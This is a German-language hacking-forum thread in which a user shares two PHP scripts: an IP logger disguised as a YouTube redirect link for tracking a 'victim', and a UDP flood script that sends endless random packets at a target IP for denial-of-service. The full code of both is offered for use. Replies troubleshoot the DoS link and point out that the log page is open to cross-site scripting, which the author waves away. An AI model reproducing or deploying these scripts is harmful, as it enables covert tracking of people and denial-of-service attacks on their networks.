Kleines PHP Script für euch

[neophyte08]

So hab mich mal bissl nützlich gemacht und ein warscheinlich unnützes PHP Script geschrieben um die IP Adresse eines Victims rauszubekommen.

Funktionsweise:

Ihr gebt dem Victim eine Url per out.php?url=http://de.youtube.com/watch?v=qi_BX5cmreE über. Das Victim sieht nur diese Seite hier
http://de.youtube.com/watch?v=qi_BX5cmreE. Im Hintergrund wurde die IP geloggt in "iplog/ip.html" .

Wenn ihr die ip.html aufruft seht ihr die

die Zeit des Logs
das Datum des Logs
die IP des Victims

Außerdem sind gleich links generiert worden um eine

dos-attacke über euren PHP Server auszuführen
ein whois, trace oder scan durch Netcraft zu machen.

Ich versichere euch das es nicht verseucht ist =)

Entweder ihr ladet euch das script bei Rapidshare runter (ignoriert die "rs-punkt" Datei die ist nur da damit ich ein paar Punkte bei Rapidshare kriege um das Archiv zu vergrößern )

Downloadlink: http://rapidshare.com/files/14140572...4free-hack.zip


oder ihr benutzt den Code hier :

out.php

Code:

<?php
//logfile adresse
$logfile = "iplog/ip.html";

//IP
$ip = $_SERVER['REMOTE_ADDR'];

//Zeit 
$zeit = date("H:i:s");

//Datum
$datum = date("d.m.Y");

//IP Log
$text = "Neue IP geloggt - [".$ip."] am [".$datum."] um [".$zeit."] Uhr | Weiterleitung f&uuml;hrte zu [url='".$_GET[url]."']".$_GET." | IP DOS | whois | Trace Netcraft Scan
";


$fp = fopen($logfile, "a");

fwrite($fp, $text);

fclose($fp); 

//Weiterleitung

if($_GET[url]==NULL){

		echo "Und wohin soll ich jetzt weiterleiten du Ei?";

}else{

		header("Location: ".$_GET[url]."");

}


?>

dos.php

Code:

<?php
if (!$_GET['target'])
   die('Kein  Ziel angegeben!');

$target = $_GET['target'];
$sock = socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock)
  die(__LINE__);

$data='';

for ($i=0;$i<1400;$i++)
{
  $data.=chr(rand(0,255));
}

while(true)
{
  if (!socket_sendto($sock,$data,strlen($data),0,$target,9))
    die(__LINE__);
$time = date("H:i:s");
echo("$time | DOS läuft
");
}
?>

Hoffe konnte bissl helfen =)

[kInGoFcHaOs]

Neue IP geloggt - [yy.20xx7.xx.xx] am [31.08.2008] um [00:xx:57] Uhr | Weiterleitung führte zu http://xxx.xxx.xxx/xxx?x=xx_xxx| IP DOS | whois | Trace Netcraft Scan


DOS führt auf iplog/dos.php was falsch ist ^^

ausserdem wenn das wer rausfindet kann man die IP.html Cross side Scripten ^^

[neophyte08]

IP DOS

wo komm ich da in den "iplog" ordner?

natürlich kann man dann xss ausführen aber da jetz noch nen schutz einzubauen wäre sinnlos da die meisten eh keine peilung haben =)

[kInGoFcHaOs]

ich werd auf jedenfall weitergeleitet auf iplog

//edit
du weist ned was ich meine!
wenn ich bei der logfile(!!!) auf IP DOS gehe will er die dos.php im iplog ordner ausführen!

[maoshe]

also statt
IP DOS
das hier:
IP DOS

oder die dos.php in den ordner kopieren

[neophyte08]

mhmm kp worans liegt hab die ordner struktur bissl für euch geändert da ich die beim meinen server bissl anders hab^^

[hersch24]

lol das kann man auch in 6 zeilen verwirklichen ...